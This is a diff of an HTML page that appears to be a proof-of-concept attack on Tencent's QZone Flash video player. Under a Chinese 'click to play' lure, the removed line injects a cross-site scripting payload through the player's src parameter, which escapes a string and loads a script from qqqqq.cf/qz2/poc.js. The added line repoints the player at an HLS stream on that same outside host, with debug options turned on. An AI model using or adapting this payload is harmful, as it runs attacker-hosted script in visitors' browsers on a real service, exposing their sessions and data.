--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
 点击播放 flash，观看精彩直播
 <br>
 <iframe width="500" height="500"
-        src='//qzs.qzone.qq.com/open/qcloud/video/tcplayer/player.swf?mode=video&autoplay=true&preload=true&src=http://localhost:8000/res\"))}catch(e){}finally{d=document;d.head.appendChild(d.createElement(`script`)).src=`//qqqqq.cf/qz2/poc.js`}///out.m3u8&debug=true'
+        src='//qzs.qzone.qq.com/open/qcloud/video/tcplayer/player.swf?mode=video&autoplay=false&preload=true&loop=false&src=http://qqqqq.cf/hls/out.m3u8&debug=true&hls_debug=true'
         frameborder="0"></iframe>
 
 </body>
